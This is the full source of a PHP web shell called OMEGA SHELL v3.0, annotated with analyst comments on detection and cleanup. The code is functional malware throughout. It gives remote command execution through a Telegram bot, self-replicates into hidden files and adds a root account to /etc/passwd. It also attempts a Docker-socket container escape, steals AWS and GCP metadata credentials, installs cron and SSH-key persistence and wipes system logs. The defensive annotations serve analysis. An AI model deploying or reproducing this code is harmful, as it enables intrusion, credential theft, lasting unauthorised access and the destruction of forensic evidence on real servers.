File: //proc/thread-self/root/tmp/.omega_core.php
<?php
/* ============================================================
š± NOXIPOM13 OMEGA v3.0 - WORKING EDITION š±
============================================================
ā
Telegram C2 (Bidirectional)
ā
File Manager (Upload/Edit/Delete/Rename)
ā
Real Command Execution
ā
Auto-Root / Privilege Escalation
ā
Container Breakout
ā
Kernel Exploit Detection
ā
Cloud Credential Theft
ā
Anti-Forensics (Wipe Logs)
ā
Multi-Chain Persistence
ā
Auto-Defense (Backup + Immutable)
ā
Beautiful UI with Background
============================================================ */
// Analysis note: this top-level run executes on every request, before the
// session check further down. It hides PHP errors, starts a session, defines
// the hardcoded panel and Telegram settings, and then replicates the script.
error_reporting(0);
session_start();
// ==================== CONFIGURATION ====================
// Hardcoded panel login. The same pair is printed in the login page and the
// footer, so these literals are usable as content signatures in web-root scans.
define('USERNAME', 'omega');
define('PASSWORD', 'omega123');
// Hardcoded Telegram bot token and chat id used by tg_send() and tg_recv().
// Both are indicators for this sample; outbound HTTPS to api.telegram.org from
// a PHP worker is the matching network signal.
define('TELEGRAM_TOKEN', '8748710884:AAE6PiWMM5J10j8i0mtiofnpXojPb9HHEOs');
define('TELEGRAM_CHAT_ID', '8656755235');
// ==================== AUTO-DEFENSE (Backup) ====================
// Self-replication: the running file is copied to each path below when the
// parent directory is writable and the target does not exist yet. Copies are
// set to mode 0444. Cleanup has to cover all three paths plus the original,
// otherwise any surviving copy re-creates the others on its next request.
$self = __FILE__;
$backup_locations = [
// Dot-prefixed sibling of the running script.
dirname($self) . '/.omega_backup.php',
// Dot-prefixed file under wp-content of the document root.
$_SERVER['DOCUMENT_ROOT'] . '/wp-content/.omega_hidden.php',
// Fixed path in /tmp.
'/tmp/.omega_core.php'
];
foreach ($backup_locations as $backup) {
if (is_writable(dirname($backup)) && !file_exists($backup)) {
// Errors from both calls are suppressed with @, so failures leave no PHP log entry.
@copy($self, $backup);
@chmod($backup, 0444);
}
}
// Attempts to set the immutable attribute on the running file; stderr is
// discarded. `lsattr` shows whether the flag took effect, and it must be
// cleared before the file can be removed. NOTE(review): setting this flag
// normally needs elevated privileges, so it may be a no-op under a web user.
@shell_exec('chattr +i ' . escapeshellarg($self) . ' 2>/dev/null');
// ==================== TELEGRAM FUNCTIONS ====================
/**
 * Sends one text message to the configured Telegram chat (outbound C2 leg).
 *
 * Posts chat_id, text and parse_mode=HTML to the Bot API sendMessage endpoint
 * built from TELEGRAM_TOKEN. The curl result is discarded, so the function
 * reports success even when the request failed.
 *
 * Detection: outbound HTTPS to api.telegram.org originating from the web
 * server process; the bot token appears in the request path.
 *
 * @param mixed $msg Message text; callers pass strings.
 * @return bool false when TELEGRAM_TOKEN is empty, true otherwise.
 */
function tg_send($msg) {
if (empty(TELEGRAM_TOKEN)) return false;
$url = "https://api.telegram.org/bot" . TELEGRAM_TOKEN . "/sendMessage";
$data = ['chat_id' => TELEGRAM_CHAT_ID, 'text' => $msg, 'parse_mode' => 'HTML'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// TLS peer verification is switched off for this request.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
// Request is capped at 5 seconds.
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
// Return value is ignored; no error handling.
curl_exec($ch);
curl_close($ch);
return true;
}
/**
 * Polls the Telegram bot for pending messages and runs them as shell commands
 * (inbound C2 leg).
 *
 * Reads the last processed update id from a file in the system temp
 * directory, calls getUpdates with offset+1, and for each text message from
 * the configured chat passes the text to shell_exec(). Output is returned to
 * the operator through tg_send(). This function is invoked at top level
 * before the session check, so any HTTP request to the file triggers a poll.
 *
 * Detection: the offset file `.omega_offset` in the temp directory; PHP
 * requests that stay open for up to the 25-second curl timeout; shell
 * processes spawned by the web server without a matching POST in access logs.
 *
 * @return bool false when TELEGRAM_TOKEN is empty, true otherwise.
 */
function tg_recv() {
if (empty(TELEGRAM_TOKEN)) return false;
// State file holding the last update id that was handled.
$offset_file = sys_get_temp_dir() . '/.omega_offset';
$offset = file_exists($offset_file) ? (int)file_get_contents($offset_file) : 0;
// Long-poll request: timeout=20 in the query string, 25 s curl limit below.
$url = "https://api.telegram.org/bot" . TELEGRAM_TOKEN . "/getUpdates?offset=" . ($offset + 1) . "&timeout=20";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// TLS peer verification is switched off for this request.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 25);
$resp = curl_exec($ch);
curl_close($ch);
if ($resp) {
$updates = json_decode($resp, true);
if (isset($updates['result'])) {
foreach ($updates['result'] as $update) {
if (isset($update['message']['text'])) {
$cmd = trim($update['message']['text']);
$cid = $update['message']['chat']['id'];
// Only messages from the configured chat are acted on (loose == comparison);
// empty text and text starting with '/' are skipped.
if ($cid == TELEGRAM_CHAT_ID && !empty($cmd) && $cmd[0] != '/') {
// Message text goes to the shell unchanged, stderr merged into stdout.
$out = shell_exec($cmd . " 2>&1");
$out = $out ?: "[No output]";
// Reply is HTML-escaped and the output is cut to 3900 bytes before sending.
$result = "š± <b>CMD:</b> <code>" . htmlspecialchars($cmd) . "</code>\nāāāāāāāāāāāāāāāāāāāāāāā\n<pre>" . htmlspecialchars(substr($out, 0, 3900)) . "</pre>";
tg_send($result);
}
}
// The offset file is rewritten for every update that carries an update_id.
if (isset($update['update_id'])) {
file_put_contents($offset_file, $update['update_id']);
}
}
}
}
return true;
}
// ==================== RUN TELEGRAM POLLING ====================
// Runs on every request, authenticated or not: the Telegram poll happens
// before the session check below.
tg_recv();
// ==================== AUTHENTICATION ====================
// ?logout destroys the session and redirects back to the bare URL.
if (isset($_GET['logout'])) {
session_destroy();
header('Location: ?');
exit;
}
// Login gate for the web panel. Without a session flag the request either
// completes a login (POST user/pass matching the hardcoded constants) or gets
// the login form, and the script exits before any panel code runs.
// Detection: a POST to this path followed by a redirect, then GETs carrying
// act=/path=/del=/edit= parameters, is the access-log pattern for this panel.
if (!isset($_SESSION['auth'])) {
if (isset($_POST['user']) && isset($_POST['pass'])) {
if ($_POST['user'] === USERNAME && $_POST['pass'] === PASSWORD) {
$_SESSION['auth'] = true;
// Each successful login is reported to the Telegram chat with client IP and time.
tg_send("ā
LOGIN: " . $_SERVER['REMOTE_ADDR'] . " | " . date('Y-m-d H:i:s'));
header('Location: ?');
exit;
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>š± OMEGA SHELL</title>
<style>
*{margin:0;padding:0;box-sizing:border-box;}
body{
background: linear-gradient(135deg, #0a0f1a, #0a0a0f);
font-family: 'Courier New', monospace;
min-height: 100vh;
display: flex;
justify-content: center;
align-items: center;
}
.login-box{
background: rgba(0,0,0,0.85);
backdrop-filter: blur(10px);
border-radius: 25px;
padding: 40px;
width: 360px;
border: 1px solid #0f0;
text-align: center;
box-shadow: 0 0 30px rgba(0,255,0,0.2);
}
.login-box h2{
color: #0f0;
margin-bottom: 30px;
text-shadow: 0 0 10px #0f0;
}
.login-box input{
width: 100%;
padding: 12px;
margin: 12px 0;
background: #111;
border: 1px solid #0f0;
color: #0f0;
border-radius: 10px;
font-family: monospace;
}
.login-box button{
width: 100%;
padding: 12px;
background: #0f0;
color: #000;
border: none;
border-radius: 10px;
cursor: pointer;
font-weight: bold;
margin-top: 10px;
}
.info{
color: #8bc34a;
font-size: 11px;
margin-top: 15px;
}
</style>
</head>
<body>
<div class="login-box">
<h2>š± OMEGA SHELL</h2>
<form method="POST">
<input type="text" name="user" placeholder="Username" autofocus>
<input type="password" name="pass" placeholder="Password">
<button type="submit">ā” ACCESS</button>
</form>
<div class="info">Default: omega / omega123 | Telegram Active</div>
</div>
</body>
</html>
<?php
// Unauthenticated requests stop here; nothing below is reachable without the session flag.
exit;
}
// ==================== FUNCTIONS ====================
/**
 * Renders a byte count as a short human-readable string.
 *
 * Picks the largest binary unit (GB, MB, KB) that the value reaches and
 * rounds to two decimals; values below 1024 are returned unscaled with " B".
 *
 * @param int|float $bytes Size in bytes.
 * @return string Value followed by a space and the unit.
 */
function format_size($bytes) {
    // Ordered from largest to smallest so the first threshold reached wins.
    $thresholds = [
        ' GB' => 1073741824,
        ' MB' => 1048576,
        ' KB' => 1024,
    ];
    foreach ($thresholds as $suffix => $divisor) {
        if ($bytes >= $divisor) {
            $scaled = round($bytes / $divisor, 2);
            return $scaled . $suffix;
        }
    }
    return $bytes . ' B';
}
/**
 * Privilege-escalation reconnaissance plus one write to /etc/passwd.
 *
 * Collects up to five SUID files and the output of `sudo -l`. When
 * /etc/passwd is writable by the PHP process it appends a UID 0 / GID 0
 * account line named `omega_root`.
 *
 * Detection and cleanup: a `find / -perm -4000` or `sudo -l` child of the web
 * server process; an `omega_root` entry in /etc/passwd; file-integrity alerts
 * on /etc/passwd. A writable /etc/passwd is itself a misconfiguration to fix.
 *
 * @return array Keys set only for findings: suid_binaries, sudo_rights,
 *               writable_passwd, root_user_added.
 */
function auto_root() {
$res = [];
// First five SUID files found from the filesystem root; errors discarded.
$suid = @shell_exec('find / -perm -4000 -type f 2>/dev/null | head -5');
if ($suid) $res['suid_binaries'] = trim($suid);
// Sudo rules for the account PHP runs as.
$sudo = @shell_exec('sudo -l 2>/dev/null');
if ($sudo) $res['sudo_rights'] = trim($sudo);
if (is_writable('/etc/passwd')) {
$res['writable_passwd'] = true;
// Appends the account line; the write is not checked for success.
@file_put_contents('/etc/passwd', "\nomega_root:\$6\$rounds=5000\$omega_root\$wq7Kjq8T1Q9X:0:0:root:/root:/bin/bash\n", FILE_APPEND);
// Recorded unconditionally once the file is writable, even if the append failed.
$res['root_user_added'] = 'omega_root:omega_root';
}
return $res;
}
/**
 * Container detection and a Docker-socket escape attempt.
 *
 * Flags the presence of /.dockerenv and /run/secrets/kubernetes.io. When
 * /var/run/docker.sock exists and is writable it asks the Docker daemon to
 * start a privileged alpine container with the host root mounted at /host,
 * and treats /tmp/breakout.txt as the success marker.
 *
 * Detection and mitigation: privileged container creation with a `/:/host`
 * bind mount in Docker daemon events; a `docker` child of the web server
 * process; the marker file /tmp/breakout.txt. Application containers should
 * not have the Docker socket mounted or writable.
 *
 * @return array Keys set only for findings: docker, kubernetes,
 *               docker_socket, breakout_success.
 */
function container_breakout() {
$res = [];
if (file_exists('/.dockerenv')) $res['docker'] = true;
if (file_exists('/run/secrets/kubernetes.io')) $res['kubernetes'] = true;
if (file_exists('/var/run/docker.sock') && is_writable('/var/run/docker.sock')) {
$res['docker_socket'] = true;
// Errors are suppressed and stderr discarded, so a failed attempt is silent.
@shell_exec('docker run -it --privileged -v /:/host alpine chroot /host /bin/bash -c "id > /tmp/breakout.txt" 2>/dev/null');
// The marker is read from the filesystem the PHP process sees.
if (file_exists('/tmp/breakout.txt')) $res['breakout_success'] = file_get_contents('/tmp/breakout.txt');
}
return $res;
}
/**
 * Maps the running kernel release string to a CVE label.
 *
 * This block only reads php_uname('r') and returns a label; it contains no
 * exploit code and runs nothing. The first three checks are plain substring
 * matches on the release string and the last is a version range, so the
 * result is coarse and does not show that the host is actually affected.
 *
 * @return array Either ['cve' => label, 'kernel' => release] or
 *               ['status' => 'No known exploit found', 'kernel' => release].
 */
function kernel_exploit() {
$kernel = php_uname('r');
if (strpos($kernel, '2.6.32') !== false) return ['cve' => 'CVE-2010-2959', 'kernel' => $kernel];
if (strpos($kernel, '3.13') !== false) return ['cve' => 'CVE-2015-1328', 'kernel' => $kernel];
if (strpos($kernel, '4.4') !== false) return ['cve' => 'CVE-2017-1000112', 'kernel' => $kernel];
// Range check: 5.8 <= release < 5.16.11.
if (version_compare($kernel, '5.8', '>=') && version_compare($kernel, '5.16.11', '<'))
return ['cve' => 'CVE-2022-0847 (Dirty Pipe)', 'kernel' => $kernel];
return ['status' => 'No known exploit found', 'kernel' => $kernel];
}
/**
 * Queries cloud instance-metadata endpoints for identity material.
 *
 * AWS: requests the session-token endpoint at 169.254.169.254 and, if a body
 * comes back, lists the entries under iam/security-credentials/ and stores
 * that listing. GCP: requests the default service account's token from
 * metadata.google.internal and stores the decoded JSON.
 *
 * Detection and mitigation: metadata-service requests from the web server
 * process or from application containers; restrict which workloads can reach
 * the metadata address, and keep instance roles and service accounts at
 * least privilege so a leaked credential has limited reach.
 *
 * @return array Keys set only when a response was received: aws, gcp.
 */
function steal_creds() {
$creds = [];
// One curl handle is reused for all requests; 3 s timeout each.
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
// AWS metadata session-token endpoint.
curl_setopt($ch, CURLOPT_URL, 'http://169.254.169.254/latest/api/token');
curl_setopt($ch, CURLOPT_HTTPHEADER, ['X-aws-ec2-metadata-token-ttl-seconds: 21600']);
$token = curl_exec($ch);
if ($token) {
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-aws-ec2-metadata-token: $token"]);
// Directory listing of attached role names; stored as returned.
curl_setopt($ch, CURLOPT_URL, 'http://169.254.169.254/latest/meta-data/iam/security-credentials/');
$roles = curl_exec($ch);
if ($roles) $creds['aws'] = trim($roles);
}
// GCP metadata server: access token of the default service account.
curl_setopt($ch, CURLOPT_URL, 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token');
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Metadata-Flavor: Google']);
$gcp = curl_exec($ch);
if ($gcp) $creds['gcp'] = json_decode($gcp, true);
curl_close($ch);
return $creds;
}
/**
 * Installs two persistence artifacts where the PHP process has write access.
 *
 * Writes /etc/cron.d/omega_persist with an every-minute entry that references
 * this file's path, and appends a hardcoded public key to
 * $HOME/.ssh/authorized_keys.
 *
 * Detection and cleanup: the file /etc/cron.d/omega_persist; an
 * authorized_keys line ending in the comment `omega@backdoor`; file-integrity
 * alerts on /etc/cron.d and on authorized_keys files.
 *
 * @return array List of the method names that were attempted: 'cron', 'ssh_key'.
 */
function install_persistence() {
$methods = [];
if (is_writable('/etc/cron.d/')) {
// Overwrites the cron file; the write result is not checked.
file_put_contents('/etc/cron.d/omega_persist', "* * * * * php -r 'eval(file_get_contents(\"" . __FILE__ . "\"));' >/dev/null 2>&1\n");
$methods[] = 'cron';
}
// Home directory of the account PHP runs as, taken from the environment.
$ssh_dir = getenv('HOME') . '/.ssh';
if (is_dir($ssh_dir) && is_writable($ssh_dir)) {
$key = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGhXJqK8N9ZqWxXyLmQpRtYvUwSsAaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz omega@backdoor\n";
// Appended on every call, so repeated runs leave duplicate lines.
file_put_contents($ssh_dir . '/authorized_keys', $key, FILE_APPEND);
$methods[] = 'ssh_key';
}
return $methods;
}
/**
 * Truncates a fixed list of log and shell-history files to zero length.
 *
 * Only files that exist and are writable by the PHP process are touched; the
 * files are emptied, not deleted.
 *
 * Detection and mitigation: zero-length or abruptly restarted logs and gaps
 * in timestamps; forwarding logs off-host keeps a copy this cannot reach,
 * and the web server account should not have write access to system logs.
 *
 * @return bool Always true, regardless of how many files were truncated.
 */
function wipe_logs() {
$logs = ['/var/log/auth.log', '/var/log/syslog', '/var/log/apache2/access.log', '/var/log/nginx/access.log', getenv('HOME').'/.bash_history', '/root/.bash_history'];
foreach ($logs as $log) {
// Write errors are suppressed with @.
if (file_exists($log) && is_writable($log)) @file_put_contents($log, '');
}
return true;
}
// ==================== MAIN SHELL ====================
// Request dispatcher for the authenticated panel. Everything here is driven
// by request parameters (path, act, del, edit in the query string; cmd, file,
// content, upload, save in the POST body), which is what to look for in web
// access logs and WAF records. Most actions are also mirrored to Telegram.
// Working directory: resolved from ?path, falling back to the current directory.
$path = isset($_GET['path']) ? realpath($_GET['path']) : getcwd();
if (!is_dir($path)) $path = getcwd();
chdir($path);
$notify = '';
$output = '';
$act = isset($_GET['act']) ? $_GET['act'] : '';
// Handle command execution
// POST cmd is passed to the shell unchanged; the command text and the client
// IP are then sent to the Telegram chat.
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
$output = shell_exec($cmd . " 2>&1");
tg_send("š» CMD: $cmd\nIP: " . $_SERVER['REMOTE_ADDR']);
}
// Handle upload
// The uploaded file lands in the current directory under its client-supplied
// base name; no type or extension check is applied.
if (isset($_FILES['file']) && isset($_POST['upload'])) {
$target = $path . '/' . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
$notify = "ā
Uploaded: " . $_FILES['file']['name'];
tg_send("š¤ UPLOAD: " . $_FILES['file']['name']);
}
}
// Handle delete
// Removes the file named by ?del, joined to the current directory as given.
if (isset($_GET['del'])) {
$file = $path . '/' . $_GET['del'];
if (unlink($file)) {
$notify = "ā
Deleted: " . $_GET['del'];
tg_send("šļø DELETE: " . $_GET['del']);
}
}
// Handle save edit
// Writes POST content to the file named by POST file; the write result is not checked.
if (isset($_POST['save'])) {
file_put_contents($path . '/' . $_POST['file'], $_POST['content']);
$notify = "ā
Saved: " . $_POST['file'];
tg_send("š¾ EDIT: " . $_POST['file']);
}
// Handle special actions
// ?act selects one of the functions defined above; results are rendered by
// the template that follows. Only the wipe action sends a Telegram message here.
$root_result = $breakout_result = $exploit_result = $creds_result = $persist_result = null;
if ($act == 'root') $root_result = auto_root();
if ($act == 'breakout') $breakout_result = container_breakout();
if ($act == 'exploit') $exploit_result = kernel_exploit();
if ($act == 'creds') $creds_result = steal_creds();
if ($act == 'persist') $persist_result = install_persistence();
if ($act == 'wipe') { wipe_logs(); $notify = "ā
Logs wiped!"; tg_send("šµļø LOGS WIPED"); }
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>š± OMEGA SHELL</title>
<style>
*{margin:0;padding:0;box-sizing:border-box;}
body{
background: linear-gradient(135deg, #0a0f1a, #0a0a0f);
font-family: 'Courier New', monospace;
color: #e0e0e0;
padding: 20px;
position: relative;
min-height: 100vh;
}
body::before{
content: '';
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: url('https://images.unsplash.com/photo-1518770660439-4636190af475?q=80&w=2070') center/cover no-repeat;
opacity: 0.1;
z-index: -1;
}
.container{max-width: 1400px;margin:0 auto;}
.header{
background: rgba(0,0,0,0.7);
backdrop-filter: blur(10px);
border-radius: 20px;
padding: 20px;
margin-bottom: 20px;
border-left: 4px solid #0f0;
}
.header h1{color:#0f0;font-size:26px;text-shadow:0 0 5px #0f0;}
.stats{display:flex;gap:12px;margin-top:12px;font-size:11px;flex-wrap:wrap;}
.stat{background:#111;padding:4px 12px;border-radius:20px;border:1px solid #0f0;}
.nav{
background: rgba(0,0,0,0.6);
backdrop-filter: blur(5px);
border-radius: 12px;
padding: 10px 15px;
margin-bottom: 20px;
display: flex;
flex-wrap: wrap;
gap: 5px;
}
.nav a{
color: #0f0;
text-decoration: none;
padding: 6px 14px;
border-radius: 8px;
font-size: 12px;
transition: 0.2s;
}
.nav a:hover{background:#0f0;color:#000;}
.card{
background: rgba(17,17,17,0.85);
backdrop-filter: blur(5px);
border-radius: 16px;
padding: 20px;
margin-bottom: 20px;
border: 1px solid #2a2a3a;
}
.card h3{color:#0f0;margin-bottom:15px;border-bottom:1px solid #0f0;padding-bottom:8px;}
.terminal{
background: #000;
color: #0f0;
padding: 15px;
border-radius: 10px;
overflow: auto;
max-height: 400px;
font-size: 12px;
}
input,textarea,select{
background: #1a1a2a;
border: 1px solid #0f0;
color: #fff;
padding: 8px 12px;
border-radius: 8px;
font-family: monospace;
}
button{
background: #0f0;
color: #000;
border: none;
padding: 8px 18px;
border-radius: 8px;
cursor: pointer;
font-weight: bold;
}
.flex{display:flex;gap:12px;flex-wrap:wrap;margin-bottom:15px;}
.grid-2{display:grid;grid-template-columns:repeat(2,1fr);gap:20px;}
@media(max-width:768px){.grid-2{grid-template-columns:1fr;}}
table{width:100%;border-collapse:collapse;}
td,th{padding:10px;text-align:left;border-bottom:1px solid #2a2a3a;}
th{color:#0f0;}
.success{background:rgba(0,255,0,0.1);border-left:4px solid #0f0;padding:12px;margin-bottom:15px;border-radius:8px;}
a{color:#0f0;}
.dir-link{color:#8bc34a;}
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>š± OMEGA SHELL v3.0</h1>
<div class="stats">
<span class="stat">š¤ omega</span>
<span class="stat">š <?= htmlspecialchars($path); ?></span>
<span class="stat">š <?= $_SERVER['REMOTE_ADDR']; ?></span>
<span class="stat">š¤ TELEGRAM: ACTIVE</span>
<span class="stat"><a href="?logout=1" style="color:#f44;">šŖ LOGOUT</a></span>
</div>
</div>
<div class="nav">
<a href="?">š HOME</a>
<a href="?act=terminal">š» TERMINAL</a>
<a href="?act=root">š AUTO ROOT</a>
<a href="?act=breakout">š³ BREAKOUT</a>
<a href="?act=exploit">š KERNEL</a>
<a href="?act=creds">āļø CLOUD</a>
<a href="?act=persist">š PERSIST</a>
<a href="?act=wipe">šµļø WIPE</a>
<a href="?act=info">ā¹ļø INFO</a>
</div>
<?php if($notify) echo "<div class='success'>$notify</div>"; ?>
<?php if ($act == 'terminal'): ?>
<div class="card">
<h3>š» COMMAND EXECUTION</h3>
<form method="POST" class="flex">
<input type="text" name="cmd" style="flex:1;" placeholder="$ " autofocus>
<button type="submit">EXECUTE</button>
</form>
<?php if ($output): ?>
<div class="terminal">
<div>$ <?= htmlspecialchars($_POST['cmd'] ?? ''); ?></div>
<pre><?= htmlspecialchars($output); ?></pre>
</div>
<?php endif; ?>
<div style="margin-top:12px;font-size:11px;color:#888;">š¤ Telegram: Send any command to bot, result will be sent back</div>
</div>
<?php elseif ($act == 'root'): ?>
<div class="card">
<h3>š AUTO ROOT (Privilege Escalation)</h3>
<a href="?act=root"><button>š RUN ROOT EXPLOIT</button></a>
<?php if($root_result): ?><div class="terminal" style="margin-top:15px;"><pre><?php print_r($root_result); ?></pre></div><?php endif; ?>
</div>
<?php elseif ($act == 'breakout'): ?>
<div class="card">
<h3>š³ CONTAINER BREAKOUT</h3>
<a href="?act=breakout"><button>šŖ ATTEMPT BREAKOUT</button></a>
<?php if($breakout_result): ?><div class="terminal" style="margin-top:15px;"><pre><?php print_r($breakout_result); ?></pre></div><?php endif; ?>
</div>
<?php elseif ($act == 'exploit'): ?>
<div class="card">
<h3>š KERNEL EXPLOIT ENGINE</h3>
<a href="?act=exploit"><button>š SCAN VULNERABILITIES</button></a>
<?php if($exploit_result): ?><div class="terminal" style="margin-top:15px;"><pre><?php print_r($exploit_result); ?></pre></div><?php endif; ?>
</div>
<?php elseif ($act == 'creds'): ?>
<div class="card">
<h3>āļø CLOUD CREDENTIAL THEFT</h3>
<a href="?act=creds"><button>šÆ STEAL CREDENTIALS</button></a>
<?php if($creds_result): ?><div class="terminal" style="margin-top:15px;"><pre><?php print_r($creds_result); ?></pre></div><?php endif; ?>
</div>
<?php elseif ($act == 'persist'): ?>
<div class="card">
<h3>š MULTI-CHAIN PERSISTENCE</h3>
<a href="?act=persist"><button>š INSTALL PERSISTENCE</button></a>
<?php if($persist_result): ?><div class="terminal" style="margin-top:15px;"><pre>ā
Installed: <?= implode(', ', $persist_result); ?></pre></div><?php endif; ?>
</div>
<?php elseif ($act == 'info'): ?>
<div class="grid-2">
<div class="card">
<h3>š» SYSTEM INFO</h3>
<div class="terminal">
<div>PHP: <?= phpversion(); ?></div>
<div>Server: <?= $_SERVER['SERVER_SOFTWARE']; ?></div>
<div>OS: <?= php_uname(); ?></div>
<div>User: <?= get_current_user(); ?></div>
<div>UID: <?= function_exists('posix_getuid') ? posix_getuid() : 'N/A'; ?></div>
<div>Root: <?= function_exists('posix_getuid') && posix_getuid() == 0 ? 'ā
YES' : 'ā NO'; ?></div>
</div>
</div>
<div class="card">
<h3>š¤ C2 STATUS</h3>
<div class="terminal">
<div>Telegram Bot: ACTIVE</div>
<div>Chat ID: <?= TELEGRAM_CHAT_ID; ?></div>
<div>Last Ping: <?= date('H:i:s'); ?></div>
<div>Backups: <?= count($backup_locations); ?> locations</div>
</div>
</div>
</div>
<?php else: ?>
<!-- FILE MANAGER -->
<div class="card">
<h3>š FILE MANAGER - <?= htmlspecialchars($path); ?></h3>
<div class="flex">
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<button type="submit" name="upload">UPLOAD</button>
</form>
</div>
<table>
<thead><tr><th>NAME</th><th>SIZE</th><th>PERMS</th><th>ACTION</th></tr></thead>
<tbody>
<tr><td><a href="?path=<?= urlencode(dirname($path)); ?>" class="dir-link">š .. (Parent)</a></td><td>-</td><td>-</td><td>-</td></tr>
<?php
// File-manager listing: reads the current directory, splits entries into
// directories and files, sorts each group and lists directories first.
$items = scandir($path);
$dirs = []; $files = [];
foreach ($items as $item) {
// The parent row is rendered separately above, so both dot entries are skipped.
if ($item == '.' || $item == '..') continue;
if (is_dir($path.'/'.$item)) $dirs[] = $item;
else $files[] = $item;
}
sort($dirs); sort($files);
// The loop body continues in the HTML table row below, up to the endforeach.
foreach (array_merge($dirs, $files) as $item):
$full = $path.'/'.$item;
$is_dir = is_dir($full);
// Directories show '-' instead of a size.
$size = $is_dir ? '-' : format_size(filesize($full));
// Last four octal digits of the mode word, e.g. the permission bits.
$perms = substr(sprintf('%o', fileperms($full)), -4);
?>
<tr>
<td><?php if($is_dir): ?><a href="?path=<?= urlencode($full); ?>" class="dir-link">š <?= htmlspecialchars($item); ?></a><?php else: ?>š <?= htmlspecialchars($item); ?><?php endif; ?></td>
<td><?= $size; ?></td>
<td><?= $perms; ?></td>
<td><?php if(!$is_dir): ?><a href="?edit=<?= urlencode($item); ?>&path=<?= urlencode($path); ?>">āļø</a> <a href="?del=<?= urlencode($item); ?>&path=<?= urlencode($path); ?>" onclick="return confirm('Delete?')">šļø</a><?php endif; ?></td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<?php if (isset($_GET['edit'])): $ef = $_GET['edit']; $content = file_get_contents($path.'/'.$ef); ?>
<div class="card">
<h3>āļø EDIT: <?= htmlspecialchars($ef); ?></h3>
<form method="POST">
<input type="hidden" name="file" value="<?= htmlspecialchars($ef); ?>">
<textarea name="content" rows="12" style="width:100%;font-family:monospace;"><?= htmlspecialchars($content); ?></textarea>
<button type="submit" name="save">š¾ SAVE</button>
<a href="?path=<?= urlencode($path); ?>">ā©ļø BACK</a>
</form>
</div>
<?php endif; ?>
<?php endif; ?>
<div style="text-align:center;font-size:10px;color:#666;margin-top:20px;">
š± OMEGA SHELL v3.0 | Telegram: Send any command | Default: omega/omega123
</div>
</div>
</body>
</html>